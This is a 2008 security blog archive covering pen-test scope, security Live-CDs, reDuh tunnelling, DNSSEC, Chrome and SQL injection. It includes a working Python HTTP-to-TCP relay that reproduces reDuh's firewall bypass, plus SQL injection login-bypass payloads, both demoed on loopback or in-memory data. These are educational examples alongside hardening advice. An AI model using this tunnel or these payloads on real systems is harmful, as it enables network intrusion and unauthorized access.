Review: SANS Pen Test Webcast Part 1

October 16th, 2008 | No Comments | Posted in Attacks, News, Web

Yesterday was the SANS Webcast on “Combining Network, Web App and Wireless into the Ultimate Penetration Test.” I had registered to catch it live, but my lunch break disappeared under a pile of deadlines. Today I was able to catch the archive of the presentation.

The focus of the webcast was, as the title describes, using combined methods and attack vectors during a penetration test. Sometimes, depending on the client's requirements, a pen test will be requested but with a very limited scope. For example, they might only want their wireless network tested, or a single public-facing web application. Usually, due to either lack of interest or cost, some companies will not go for the full monty. I think this is bad because the results provided from such a pen test are only part of the picture. I think that if a business is going to have a pen test conducted it should cover all the potential attack vectors. Otherwise a business might have a false sense of security.

What security programs would be on your dream Live-CD?

September 13th, 2008 | 5 Comments | Posted in Linux, Portable, Software, Tools, Web

I was going to write a post about Samurai Web Testing Framework but someone already beat me to it. It’s a good post so I wanted to pass along the link. I really hate seeing the same topic covered the same way over and over again.

Instead I am going to talk a little about the idea of making your own security Live-CD. Samurai WTF was the first Live-CD I have used that was built on Ubuntu. I have been using Ubuntu since 5.04 and was really happy to see a familiar GUI. I noticed that all Samurai WTF essentially is, is Ubuntu with a bunch of cool web pen-testing programs preloaded, Firefox preloaded with some cool web pen-testing add-ons, and the best themed Live-CD bar none.

This got me thinking about an article I read earlier this week at Linux.com about a program called Ubuntu Customization Kit (UCK). With UCK you can take an existing Ubuntu, Kubuntu, Edubuntu or Xubuntu release and create your own pre-configured Ubuntu Live-CD, just as Samurai WTF does, and as BackTrack does on its own base (BT is built on Slax rather than Ubuntu).

reDuh - TCP Redirection over HTTP

September 5th, 2008 | No Comments | Posted in Attacks, News, Web

Have you ever wondered why free web hosts don’t give you ASP/JSP/PHP access? Here is one really good reason. SensePost's reDuh is a server-side page (written as a JSP, PHP or ASP page) that can be used to bypass a firewall once you have uploaded it to a web server: you connect to the page over plain HTTP, and the page builds a TCP circuit on your behalf so that your traffic reaches the nodes inside the network behind it. The firewall sees nothing but HTTP to the web server; the connections to the internal hosts are opened by the web server itself.
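To make concrete what a page like reDuh does, here is an added example of my own (not SensePost's code; reDuh's real protocol keeps sockets open and multiplexes them across many requests, this one opens a fresh socket per POST): an HTTP-to-TCP relay handler standing in for the uploaded page, a loopback echo service standing in for an internal host, and the attacker-side client that wraps TCP payload in ordinary POST requests. The `/relay` path, the `host`/`port` query parameters and all addresses and ports are assumptions for the demo.

```python
"""Minimal HTTP-to-TCP relay in the spirit of reDuh (added example, not
SensePost's code): the attacker talks HTTP to a page on the web server and
the page opens TCP connections to internal hosts on the attacker's behalf."""
import socket
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from socketserver import StreamRequestHandler, ThreadingTCPServer
from urllib.parse import parse_qs, urlparse


class InternalEchoHandler(StreamRequestHandler):
    """Stand-in for a host on the intranet (constructed for the demo):
    reads what it is sent and answers with it upper-cased."""

    def handle(self):
        data = self.rfile.read()  # the relay half-closes, so this reads to EOF
        self.wfile.write(data.upper())


class RelayHandler(BaseHTTPRequestHandler):
    """Stand-in for the uploaded page. Each POST /relay?host=H&port=P carries
    a chunk of TCP payload; the handler connects to H:P *from the web server*,
    sends it and returns the reply as the HTTP response body. One socket per
    request (reDuh keeps sockets alive across requests), same trick."""

    def do_POST(self):
        query = parse_qs(urlparse(self.path).query)
        host = query["host"][0]
        port = int(query["port"][0])
        length = int(self.headers.get("Content-Length", "0"))
        payload = self.rfile.read(length)
        # The outbound connection originates on the web server, which is why a
        # firewall that only inspects traffic from the Internet never sees it.
        with socket.create_connection((host, port), timeout=5) as sock:
            sock.sendall(payload)
            sock.shutdown(socket.SHUT_WR)
            reply = b"".join(iter(lambda: sock.recv(4096), b""))
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):
        pass  # keep the demo quiet; a real server would log every POST


def tunnel_send(relay_url, host, port, payload):
    """Attacker side: wrap one TCP payload destined for host:port in a plain
    HTTP POST to the relay page and return what the internal host answered."""
    req = urllib.request.Request(
        f"{relay_url}?host={host}&port={port}", data=payload, method="POST")
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(req, timeout=5) as resp:
        return resp.read()


def _serve_in_background(server):
    threading.Thread(target=server.serve_forever, daemon=True).start()


def run_demo(payload=b"ping\n"):
    """Bring up the fake internal host and the relay on OS-chosen loopback
    ports, push one payload through the tunnel and return the reply."""
    internal = ThreadingTCPServer(("127.0.0.1", 0), InternalEchoHandler)
    relay = ThreadingHTTPServer(("127.0.0.1", 0), RelayHandler)
    _serve_in_background(internal)
    _serve_in_background(relay)
    try:
        relay_url = f"http://127.0.0.1:{relay.server_address[1]}/relay"
        return tunnel_send(relay_url, "127.0.0.1",
                           internal.server_address[1], payload)
    finally:
        relay.shutdown()
        internal.shutdown()
        relay.server_close()
        internal.server_close()


if __name__ == "__main__":
    print(run_demo())  # b'PING\n'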

Think web site defacements are bad for your company's image? Imagine someone using something like this to get full access into your company's network. I’m going to test this when I have the time, but I thought that if some of you hadn’t read about this presentation at BlackHat I would share it with you.

Make sure your web servers are hardened and that your firewall is properly patched and configured to monitor both ingress and egress between the world, your web server, and your company intranet. In particular, a web server in the DMZ should not be able to open arbitrary connections into the intranet: restrict it to the specific backend hosts and ports it genuinely needs, and alert when it starts talking to anything else, because that is exactly the traffic a page like reDuh generates. Remember, defense-in-depth is a process, not a bullet-proof plan. Also make sure your other intranet systems are patched and monitored.

I’ll post more when I have more time with reDuh.  If you have already tested this tool I would like to know what you think in the comments.

Can you say knee jerk reaction?

September 2nd, 2008 | No Comments | Posted in News, Web

I know that since the DNS cache-poisoning vulnerability that was announced a while back a lot of people have been making plans to move to DNSSEC. Well, now the government has mandated that all .GOV domains move to DNSSEC.

I am all for DNSSEC because at this time it is the best working model to reduce the risks that threaten traditional DNS. My concern is how this “mandate” is going to be implemented. DNSSEC is not a simple task to deploy. I can’t imagine that anyone is claiming this won’t be a major undertaking. Every signed zone needs new record types created and validated: RRSIG (the signature over each record set), DNSKEY (the zone's public keys), DS (a digest of the zone's key-signing key that the parent, here .GOV, must publish so the chain of trust reaches down to you), and NSEC (the records that let a resolver prove a name does not exist). On top of that comes custody of the private keys used for signing, plus re-signing before signatures expire and rolling keys over, which means coordinating a DS update with the parent every time the key-signing key changes.

InfoSecEvents has more about the top-level .GOV domains moving to DNSSEC here. I would like to know if your company is considering going to DNSSEC, so please post your views in the comments.

I really think DNSSEC is a good, logical next step, but I worry about this being more a “knee jerk reaction” than a well-laid plan. I would like to know what your thoughts are on DNSSEC. Please post in the comments.

Google Chrome

September 2nd, 2008 | No Comments | Posted in News, Web

I downloaded Google Chrome earlier today and so far I really like it. The only real use for it I would have at this time would be as a wrapper for my Google services like Gmail and Analytics. For those who want to know about the security side, check out this post from RioSec on “Google Chrome Security First Look.” It’s too early to say, but I think based on first impressions Chrome looks like a step in the right direction for security. This is Google's first BETA release, so I would still consider it ALPHA until a few updates are released. I guess it’s nice they planned ahead for that: it seems every time you launch Chrome it checks for updates. We will also need to wait and see how third-party plugins are added in the future. This will also have a significant impact on the security of the Chrome browser. I posted yesterday about the threat of third-party plugins after the IBM ISS X-Force mid-year report, which you can read about here.

If you're one of the brave few who also jumps in early, let me know about your experience with Google Chrome in the comments.

Anatomy of a malware scam

August 22nd, 2008 | No Comments | Posted in Attacks, Web, Windows

I see from my Google Analytics that lots of you are interested in my post on the Antivirus malware scam going around. I read a great post today from The Register about the “Anatomy of a malware scam” that uses the Antivirus 2009 malware as the basis of the whole article.

I wanted to give those looking for more information about what is “under the hood” of a scam like this the link. I warn you, it is a very long and detailed post, so if you really aren’t that curious about the technical aspects of the scam I would skip it. For those of you who do read it, let me know in the comments what you thought about it.

SQL Injection for Dummies

August 22nd, 2008 | No Comments | Posted in Research, Web, Windows

I have been working on an article/lecture about SQL Injection for a class I am teaching. Today I found a post on Hackanoia about SQL Injection attacks on IIS/ASP platforms. I am working on one that focuses on the LAMP stack since that is the dominant platform on the Web.

What is nice about this article is that many business websites use the IIS/ASP model for enterprise and commercial web applications. Since I’m working in a different direction I wanted to provide a link to this great post.

It tells you everything you need to set up your test environment and how to go about testing. I would suggest that anyone interested in SQL Injection attacks check out this article and let me know what you think. I am new to web pen-testing, but the post seems complete. If you have a chance to follow it, please post your comments below. If you have other sites that cover SQL Injection or other injection flaws, please post them in the comments.
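Since the post is about setting up a test environment and how to go about testing, here is an added example of my own (not code from this post or from the Hackanoia article it links) showing the first probe a tester makes and the classic login-bypass payloads, run against a string-concatenated query and against its parameterized fix. sqlite3 stands in for the MySQL of a LAMP stack so it runs offline; the `users` table is constructed sample data and the function names are mine.

```python
"""Added example (not code from the post or the article it links): the first
probe a tester makes and the classic login-bypass payloads, run against a
string-concatenated query and against its parameterized fix. sqlite3 stands
in for MySQL; the users table is constructed sample data."""
import sqlite3


def build_db():
    """Constructed sample data standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """The LAMP-style mistake: user input is spliced into the SQL text, so a
    quote in the input ends the string literal and the rest becomes SQL."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    """The fix: placeholders. The driver passes the input as values, never as
    SQL syntax, so a quote is just a character in a name."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def looks_injectable(conn, login):
    """Tester's first probe: a lone quote breaks a concatenated query (the
    database reports a syntax error) but is harmless data to a parameterized
    one. Real testing also watches error pages, timing and content changes."""
    try:
        login(conn, "alice'", "anything")
    except sqlite3.OperationalError:
        return True
    return False


# Classic payloads. `-- ` starts a comment in MySQL and in SQLite, so the
# password check after it is dropped; the tautology makes the WHERE clause
# true for every row, and fetchone() hands back the first one (the admin).
BYPASS_COMMENT = ("alice' -- ", "wrong")
BYPASS_TAUTOLOGY = ("x' OR '1'='1", "x' OR '1'='1")


if __name__ == "__main__":
    db = build_db()
    print(looks_injectable(db, login_vulnerable))      # True
    print(looks_injectable(db, login_parameterized))   # False
    print(login_vulnerable(db, *BYPASS_COMMENT))       # ('alice', 'admin')
    print(login_parameterized(db, *BYPASS_COMMENT))    # None
```

The probe is the same one you would run against a real form field: if a single quote produces a database error, the input is reaching the SQL parser as syntax, and the bypass payloads are the next thing to try.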

Samurai Web Testing Framework

August 20th, 2008 | No Comments | Posted in Attacks, Research, SQL Injection, Software, Tools, Web

Last week I had a student ask me about website pen-testing programs.  I told him about a new framework I had heard about called Samurai Web Testing Framework.  Samurai WTF is a Live-CD that uses Ubuntu as the host OS. It comes preloaded with several popular programs that are used for testing websites and web applications.

I haven’t had much time to investigate this tool, but it seems like BackTrack for web testers. I have to say, from a theme point of view I really like the “samurai” and “Edo” splash screens and wallpaper; I think they add some nice detail.

You can visit the main website here and download the first version of the Live-CD here. You will need to log in as user “samurai” with password “samurai”. I got lucky on my second try logging in. Once you log in, the README gives you the user name and password. I thought that was funny…

I would like to have time to try this out but I don’t see that happening anytime soon.  I would really like to hear from anyone using this tool.  If you do download it and try it out please post comments on what you think about it.  I will post a follow-up when I have the time.